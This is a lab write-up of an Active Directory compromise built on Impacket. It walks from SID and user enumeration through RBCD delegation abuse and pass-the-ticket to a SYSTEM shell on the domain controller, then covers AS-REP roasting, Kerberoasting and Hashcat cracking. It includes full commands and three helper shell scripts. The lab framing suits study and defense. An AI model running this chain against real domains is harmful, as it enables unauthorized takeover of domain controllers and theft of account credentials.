Overview

In this lab, I performed a series of Active Directory exploitation techniques using Impacket, starting from domain enumeration and progressing toward Kerberos-based attacks and privilege escalation paths.

All activities were conducted in a controlled and authorized lab environment, simulating real-world attack scenarios.

This write-up focuses specifically on:

  • Impacket-based enumeration
  • SID brute forcing
  • Domain reconnaissance
  • Kerberos attack surface identification
  • AS-REP Roasting
  • Kerberoasting
  • Privilege escalation to SYSTEM on the domain controller via delegation abuse (RBCD)

Lab Environment

  • Domain: ZeroDay.local
  • Domain Controller: ZeroDay-DC
  • Attacker Machine: Kali Linux
  • Tools Used: Impacket Suite, Hashcat

1. SID Enumeration via lookupsid

The engagement began with SID brute forcing to enumerate domain users and groups. lookupsid authenticates over SMB to the LSARPC named pipe, retrieves the domain SID, then resolves consecutive RIDs to account names, so any valid domain credential is sufficient and no LDAP access is needed:

impacket-lookupsid ZeroDay.local/rahul_sharma:'Passw0rd!'@192.168.132.198

Observation

  • Successfully retrieved the domain SID
  • Enumerated groups:
      • Domain Users
      • Domain Admins
      • Enterprise Admins
  • Enumerated accounts:
      • Service account SQLService
      • Additional users: vijay_singh, rahul_sharma, ldapuser

Impact

This step provides the foundation for the later attacks, in particular by identifying:

  • High-value groups whose members are worth targeting
  • Service accounts (critical for Kerberoasting)
  • A username list that can be fed to GetNPUsers for AS-REP Roasting

2. Domain User Enumeration (GetADUsers)

Next, domain-wide user enumeration was performed over LDAP. The -all flag returns every user object, including disabled accounts and accounts without a mail attribute, rather than only the enabled ones. Any authenticated domain user can read these attributes by default; the lab used the Administrator credentials here, but rahul_sharma's would have sufficed:

impacket-GetADUsers ZeroDay.local/Administrator:'Password@123' -dc-ip 192.168.132.198 -all

Key Findings

  • Extracted for each account:
      • Username (sAMAccountName)
      • Password last set timestamp (pwdLastSet)
      • Last logon details (lastLogon)

Security Insight

  • Helps identify:
      • Active accounts
      • Stale accounts (no recent logon) and accounts whose password has not changed in years, which are likely to be weak
      • Targets for password attacks

3. Computer Enumeration (GetADComputers)

impacket-GetADComputers ZeroDay.local/Administrator:'Password@123' -dc-ip 192.168.132.198

Discovered Systems

  • ZeroDay-DC (Domain Controller)
  • DESKTOP-1 (Workstation)

Importance

  • Identifies the attack surface (every domain-joined host)
  • Critical for:
      • Lateral movement
      • Delegation abuse, since the target of an RBCD attack is a computer object and the attacker needs its exact sAMAccountName (ZERODAY-DC$)

4. Machine Account Abuse (addcomputer)

A new machine account was created with the low-privileged rahul_sharma credentials:

impacket-addcomputer ZeroDay.local/rahul_sharma:'Passw0rd!' -computer-name FakeComp -computer-pass 'Password@123' -dc-ip 192.168.132.198

Result

  • Successfully added: FakeComp$

Why This Matters

  • By default, any authenticated domain user can join up to 10 computers to the domain (ms-DS-MachineAccountQuota = 10), so no special rights are required
  • The attacker now controls a computer account whose password they know. addcomputer registers HOST/ SPNs on it, and an account with an SPN is what the S4U2Self/S4U2Proxy steps of the next sections require
  • This enables:
      • Resource-Based Constrained Delegation (RBCD)
      • Privilege escalation paths

5. Delegation Abuse (RBCD Attack)

Delegation rights were modified by writing FakeComp$'s SID into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the DC's computer object:

impacket-rbcd ZeroDay.local/rahul_sharma:'Passw0rd!' -action write -delegate-to ZERODAY-DC$ -delegate-from FakeComp$ -dc-ip 192.168.132.198

Outcome

  • FakeComp$ allowed to impersonate users on ZERODAY-DC$
  • S4U2Proxy attack path enabled: FakeComp$ can request a service ticket to ZERODAY-DC$ on behalf of any user that is not protected against delegation

Caveat

  • Writing this attribute requires write access to the target computer object (for example GenericWrite, WriteDacl or ownership). A plain domain user does not have that over a domain controller by default, so the success of this command means rahul_sharma had been granted such an ACE in the lab; in a real engagement, finding that ACL is the actual work
  • Accounts in the Protected Users group or marked "sensitive and cannot be delegated" cannot be impersonated this way

6. Kerberos Ticket Impersonation (getST)

Using the delegated privileges, getST first obtains a TGT for FakeComp$, then performs S4U2Self to get a ticket to itself as Administrator, and finally S4U2Proxy to turn that into a service ticket for cifs/ZeroDay-DC.ZeroDay.local:

impacket-getST -dc-ip 192.168.132.198 -spn cifs/ZeroDay-DC.ZeroDay.local -impersonate Administrator ZeroDay.local/'FakeComp$':'Password@123'

Result

  • Successfully impersonated Administrator
  • Obtained a Kerberos service ticket for the CIFS service on the DC, saved in the current directory as a ccache file

Exporting Ticket

Impacket tools read the ticket from the file named by KRB5CCNAME:

export KRB5CCNAME=Administrator@cifs_ZeroDay-DC.ZeroDay.local@ZERODAY.LOCAL.ccache

7. Pass-the-Ticket (psexec)

Using the Kerberos ticket (-k tells psexec to authenticate with the ccache, -no-pass suppresses the password prompt). The target must be the FQDN that appears in the ticket's SPN, not the IP address, otherwise no matching ticket is found in the cache:

impacket-psexec ZeroDay.local/Administrator@ZeroDay-DC.ZeroDay.local -k -no-pass -dc-ip 192.168.132.198

Result

psexec uploads and starts a service on the DC, so the resulting shell runs as:

nt authority\system
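The pass-the-ticket step only works when the ccache holds exactly what psexec -k will look for: the impersonated user, the cifs service and the host FQDN used on the command line. The shell script below is an added example for this write-up, not Impacket code. It parses the ccache file name getST wrote in this lab (user@service_host@REALM.ccache, an assumed naming rule that holds for the file shown above) and flags the common mistake of pointing psexec at the IP address instead of the SPN host.

```shell
#!/usr/bin/env bash
# Sanity-check a getST ccache against the intended psexec target before
# pass-the-ticket. Added example for this write-up, not Impacket code.
# Assumption: the ccache file name follows <user>@<svc>_<host>@<REALM>.ccache
# as written by getST in the lab, and psexec -k looks up a ticket whose SPN
# host equals the host given on the command line.

# ccache_spn_parts <ccache path>: prints "user service host realm".
ccache_spn_parts() {
    base=${1##*/}
    base=${base%.ccache}
    user=${base%%@*}
    rest=${base#*@}
    spn=${rest%@*}            # e.g. cifs_ZeroDay-DC.ZeroDay.local
    realm=${rest##*@}
    printf '%s %s %s %s\n' "$user" "${spn%%_*}" "${spn#*_}" "$realm"
}

lower() { printf '%s' "$1" | tr '[:upper:]' '[:lower:]'; }

# check_ptt_target <ccache> <psexec target host> <impersonated user> [service]
# Returns 0 when the ticket matches what psexec -k will ask for, 1 otherwise.
check_ptt_target() {
    ccache=$1; target=$2; want_user=$3; want_svc=${4:-cifs}
    set -- $(ccache_spn_parts "$ccache")   # $1 user, $2 service, $3 host, $4 realm
    [ -f "$ccache" ] || echo "note: $ccache not in $(pwd); KRB5CCNAME must point at the real file"
    if [ "$(lower "$1")" != "$(lower "$want_user")" ]; then
        echo "mismatch: ticket is for $1, command names $want_user"; return 1
    fi
    if [ "$2" != "$want_svc" ]; then
        echo "mismatch: ticket service is $2, $want_svc needed"; return 1
    fi
    if [ "$(lower "$3")" != "$(lower "$target")" ]; then
        echo "mismatch: ticket SPN host is $3; use that FQDN as the target, not $target"; return 1
    fi
    echo "ok: $1 -> $2/$3 @ $4"
}

CCACHE=Administrator@cifs_ZeroDay-DC.ZeroDay.local@ZERODAY.LOCAL.ccache
# Correct pairing, as used in the write-up:
check_ptt_target "$CCACHE" ZeroDay-DC.ZeroDay.local Administrator
# Common mistake: targeting the IP, which matches no SPN in the ccache.
check_ptt_target "$CCACHE" 192.168.132.198 Administrator || true
```

Hostname comparison is case-insensitive because Kerberos SPN hosts are matched that way; the service name (cifs) is compared exactly, since a ticket for a different service (ldap, host) will not be accepted by psexec.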

8. AS-REP Roasting (GetNPUsers)

Next, a Kerberos misconfiguration was exploited: accounts with "Do not require Kerberos preauthentication" set return an AS-REP encrypted with the user's key to anyone who asks, so the hash can be taken offline. GetNPUsers is run here unauthenticated (ZeroDay.local/ with no user), which is why it needs a username list such as the one produced in step 1. Note that -format john writes $krb5asrep$user@REALM:... without the etype field that hashcat mode 18200 expects ($krb5asrep$23$...); since the hashes are cracked with Hashcat in the next step, -format hashcat is the correct choice:

impacket-GetNPUsers -dc-ip 192.168.132.198 ZeroDay.local/ -usersfile user.txt -format hashcat -outputfile hashes

Findings

  • Extracted AS-REP hashes for:
      • vijay_singh
      • SQLService
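The -usersfile list for GetNPUsers can be built directly from the lookupsid output of step 1. The shell script below is an added example for this write-up, not Impacket code. The lookupsid output it parses is constructed to match the tool's line format (RID: DOMAIN\name (SidType)) with placeholder RIDs and domain SID; it keeps only SidTypeUser entries and drops machine accounts (trailing $), which lookupsid also reports as SidTypeUser.

```shell
#!/usr/bin/env bash
# Turn impacket-lookupsid output into the users file GetNPUsers takes with
# -usersfile. Added example for this write-up, not Impacket code.
# LOOKUPSID_OUTPUT is constructed to match lookupsid's line format
# ("RID: DOMAIN\name (SidType)"); the RIDs and the domain SID are placeholders.

LOOKUPSID_OUTPUT='[*] Brute forcing SIDs at 192.168.132.198
[*] StringBinding ncacn_np:192.168.132.198[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1111111111-2222222222-3333333333
498: ZERODAY\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: ZERODAY\Administrator (SidTypeUser)
501: ZERODAY\Guest (SidTypeUser)
502: ZERODAY\krbtgt (SidTypeUser)
512: ZERODAY\Domain Admins (SidTypeGroup)
513: ZERODAY\Domain Users (SidTypeGroup)
519: ZERODAY\Enterprise Admins (SidTypeGroup)
1000: ZERODAY\ZERODAY-DC$ (SidTypeUser)
1104: ZERODAY\rahul_sharma (SidTypeUser)
1105: ZERODAY\vijay_singh (SidTypeUser)
1106: ZERODAY\SQLService (SidTypeUser)
1107: ZERODAY\ldapuser (SidTypeUser)
1108: ZERODAY\DESKTOP-1$ (SidTypeUser)'

# stdin: lookupsid output; stdout: user account names without the domain
# prefix. Machine accounts also show as SidTypeUser and are dropped because
# AS-REP Roasting targets user accounts.
lookupsid_users() {
    sed -n 's/^[0-9][0-9]*: [^\\]*\\\(.*\) (SidTypeUser)$/\1/p' | grep -v '\$$'
}

# build_usersfile <lookupsid output file> <users file>: writes the sorted,
# de-duplicated list and prints how many names it contains.
build_usersfile() {
    lookupsid_users < "$1" | sort -u > "$2"
    wc -l < "$2" | tr -d ' '
}

tmpdir=$(mktemp -d)
printf '%s\n' "$LOOKUPSID_OUTPUT" > "$tmpdir/lookupsid.txt"
echo "users written: $(build_usersfile "$tmpdir/lookupsid.txt" "$tmpdir/user.txt")"
cat "$tmpdir/user.txt"
# Real use: save the lookupsid run with "| tee lookupsid.txt", then feed the
# result to GetNPUsers:
#   impacket-GetNPUsers -dc-ip 192.168.132.198 ZeroDay.local/ -usersfile user.txt -format hashcat -outputfile hashes
```

Groups never appear in the list because the sed pattern only accepts lines ending in (SidTypeUser); names containing spaces are preserved, since GetNPUsers reads one name per line.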

9. Offline Password Cracking

Hashes were cracked using Hashcat, mode 18200 (Kerberos 5 AS-REP, etype 23), against the lab's wordlist (the file named password):

hashcat -m 18200 hashes password

Result

  • Successfully recovered credentials

Security Insight

Weak passwords remain one of the biggest risks in AD environments: disabled pre-authentication is only exploitable in practice because the password could be guessed offline. Kerberos pre-authentication should stay enabled for every account, and the few accounts that genuinely need it disabled should have long random passwords.

10. Kerberoasting (GetUserSPNs)

Service accounts were targeted. Any authenticated user can request a service ticket for any SPN; the ticket is encrypted with the service account's key, so GetUserSPNs -request retrieves one ticket per SPN-bearing account and writes it in crackable form:

impacket-GetUserSPNs -request -dc-ip 192.168.132.198 'ZeroDay.local/vijay_singh:Password@123' -outputfile kerb_hashes.txt

Discovered

  • User account with a registered SPN: SQLService

Extracted

  • Kerberos TGS-REP hash ($krb5tgs$23$..., the ticket having been issued with RC4-HMAC)

11. Cracking Kerberos Service Ticket

hashcat -m 13100 kerb_hashes.txt password

Mode 13100 is for RC4-HMAC (etype 23) tickets; had the account been AES-only, the hash would start with $krb5tgs$17$ or $krb5tgs$18$ and need mode 19600 or 19700 instead.

Result

  • Successfully cracked the service account password

Impact

  • Service accounts often have:
      • Elevated privileges
      • Persistent access, since their passwords are rarely rotated
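Both cracking steps (AS-REP hashes in step 9, TGS-REP hashes here) assume RC4-HMAC and the hashcat-style prefix, and a mixed-up hash file is the usual reason a Hashcat run silently loads zero hashes. The shell script below is an added example for this write-up, not Impacket or Hashcat code: it reads a hash file, inserts the etype token that GetNPUsers -format john omits (assuming RC4, as in this lab), and sorts lines into one file per hashcat mode. SAMPLE_HASHES is constructed with dummy hex payloads; only the prefixes follow the real formats.

```shell
#!/usr/bin/env bash
# Triage Kerberos hashes before cracking: pick the hashcat mode from the
# hash prefix and repair AS-REP lines written in john layout. Added example
# for this write-up, not Impacket or hashcat code. SAMPLE_HASHES is
# constructed: the hex payloads are dummies, only the prefixes follow the
# real formats (GetNPUsers -format john: $krb5asrep$user@REALM:...;
# -format hashcat: $krb5asrep$<etype>$...; GetUserSPNs: $krb5tgs$<etype>$...).

SAMPLE_HASHES='$krb5asrep$vijay_singh@ZERODAY.LOCAL:0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
$krb5asrep$23$SQLService@ZERODAY.LOCAL:fedcba9876543210fedcba9876543210$ffeeddccbbaa99887766554433221100
$krb5tgs$23$*SQLService$ZERODAY.LOCAL$ZeroDay.local/SQLService*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
$krb5tgs$18$svc_aes$ZERODAY.LOCAL$*host/example*$00112233445566778899aabbccddeeff$0123456789abcdef0123456789abcdef'

# kerb_hash_mode <hash line>: print the hashcat mode for that line.
kerb_hash_mode() {
    case $1 in
        '$krb5asrep$23$'*)       echo 18200 ;;   # AS-REP, RC4-HMAC (etype 23)
        '$krb5asrep$1'[78]'$'*)  echo unknown ;; # AS-REP with an AES etype: 18200 cannot crack it
        '$krb5asrep$'*)          echo 18200 ;;   # john layout, etype token must be inserted first
        '$krb5tgs$23$'*)         echo 13100 ;;   # TGS-REP, RC4-HMAC
        '$krb5tgs$17$'*)         echo 19600 ;;   # TGS-REP, AES128-CTS-HMAC-SHA1-96
        '$krb5tgs$18$'*)         echo 19700 ;;   # TGS-REP, AES256-CTS-HMAC-SHA1-96
        *)                       echo unknown ;;
    esac
}

# stdin -> stdout: GetNPUsers -format john omits the etype; hashcat 18200
# requires "$krb5asrep$23$", so insert it where it is missing. Assumes the
# AS-REP was RC4 (etype 23), which is what the lab's hashcat run relied on.
to_hashcat_asrep() {
    sed '/^\$krb5asrep\$[0-9][0-9]*\$/!s/^\$krb5asrep\$/$krb5asrep$23$/'
}

# split_by_mode <hash file> <output prefix>: writes <prefix>.<mode> per
# hashcat mode (AS-REP lines normalised) and prints "mode count" lines.
split_by_mode() {
    infile=$1; prefix=$2
    rm -f "$prefix".*
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        mode=$(kerb_hash_mode "$line")
        if [ "$mode" = 18200 ]; then
            line=$(printf '%s\n' "$line" | to_hashcat_asrep)
        fi
        printf '%s\n' "$line" >> "$prefix.$mode"
    done < "$infile"
    for f in "$prefix".*; do
        [ -e "$f" ] || continue
        printf '%s %s\n' "${f##*.}" "$(wc -l < "$f" | tr -d ' ')"
    done
}

tmpdir=$(mktemp -d)
printf '%s\n' "$SAMPLE_HASHES" > "$tmpdir/hashes"
split_by_mode "$tmpdir/hashes" "$tmpdir/kerb"
# Each file then runs with its own mode, e.g.:
#   hashcat -m 18200 "$tmpdir/kerb.18200" password
#   hashcat -m 13100 "$tmpdir/kerb.13100" password
```

Lines that land in the .unknown file deserve a look rather than a retry with 18200: an AES AS-REP hash means the account's key was not RC4, and the etype decides the mode, not the tool that produced the hash.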

Attack Chain Summary

This lab demonstrates a complete attack workflow using Impacket:

  1. SID Enumeration
  2. User & Computer Enumeration
  3. Machine Account Abuse
  4. RBCD Delegation Attack
  5. Kerberos Ticket Impersonation
  6. Pass-the-Ticket → SYSTEM access
  7. AS-REP Roasting
  8. Kerberoasting
  9. Offline Hash Cracking

Key Takeaways

  • Misconfigured Kerberos settings can lead to full domain compromise
  • Service accounts are high-value targets
  • Delegation abuse (RBCD) is extremely powerful
  • Weak passwords + Kerberos = critical risk

Disclaimer

This activity was performed in a fully authorized lab environment for educational and research purposes under ZeroDay Security Services.